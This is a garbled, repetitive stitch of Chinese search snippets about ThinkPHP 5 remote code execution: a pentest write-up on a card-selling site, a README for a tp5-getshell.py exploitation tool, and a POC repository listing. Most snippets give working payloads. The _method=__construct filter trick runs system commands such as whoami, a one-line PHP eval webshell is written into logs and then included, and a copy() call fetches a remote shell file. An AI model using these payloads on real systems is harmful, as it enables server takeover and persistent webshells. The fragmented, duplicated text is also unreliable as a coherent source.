在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。 0x02 正文 拿到站点后,访问首页如下 测试中,发现是thinkphp的站,报错如下 不过看不出来具体版本,不确定是否存在RCE,于是用exp打一下试试 _method=__constru...
thinkphp5 RCE漏洞重现及分析 需求 python2.7 快速开始 python tp5-getshell.py -h 单url检测(phpinfo模式) 使用4种poc-phpinfo检测 python tp5-getshell.py -uhttp://www.xxx.com:8888/think5124/public/ 单url检测(getshell模式) 使用3种exp进行getshell,遇到先成功的exp就停止,防止重复getshell ...
渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms - Penetration_Testing_POC/tp5-get
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls 5.0 debug 无关 命令执行 POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=w...
1,写日志,包含日志 getshell 。payload如下: ``` 写shell进日志 _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?> 通过日志包含getshell _method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/...
<?phpcopy("http://url/shell.txt","test.php");?> 添加phpinfo是为了看代码是否正确的执行了,但如果你有自信认为一定成功,那随意。 上传图片,得到路径。 继续。 代码语言:javascript 复制 payload: _method=__construct&filter[]=think\__include_file&get[]=/www/wwwroot/site/public/upload/20190322/c627...
访问:/public/index.php?s=asasa _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al 漏洞分析 从tp5的入口文件开始分析: /public/index.php 代码语言:javascript 复制 require __DIR__.'/../thinkphp/start.php'
控制器过滤不严导致rce,漏洞详情参考 thinkphp5 RCE漏洞重现及分析 需求 python2.7 快速开始 python tp5-getshell.py -h 单url检测(phpinfo模式) 使用4种poc-phpinfo检测 python tp5-getshell.py -uhttp://www.xxx.com:8888/think5124/public/ 单url检测(getshell模式) ...
thinkphp5 RCE漏洞重现及分析 需求 python2.7 快速开始 python tp5-getshell.py -h 单url检测(phpinfo模式) 使用4种poc-phpinfo检测 python tp5-getshell.py -uhttp://www.xxx.com:8888/think5124/public/ 单url检测(getshell模式) 使用3种exp进行getshell,遇到先成功的exp就停止,防止重复getshell ...
thinkphp5 RCE漏洞重现及分析 本工具支持单url/批量检测,有phpinfo模式、cmd shell模式、getshell(写一句话)模式,批量检测直接使用getshell模式。 需求 python2.7 pip install -r requirements.txt 快速开始 python tp5-getshell.py -h 单url检测(phpinfo模式) 使用4种poc-phpinfo检测 python tp5-getshell.py...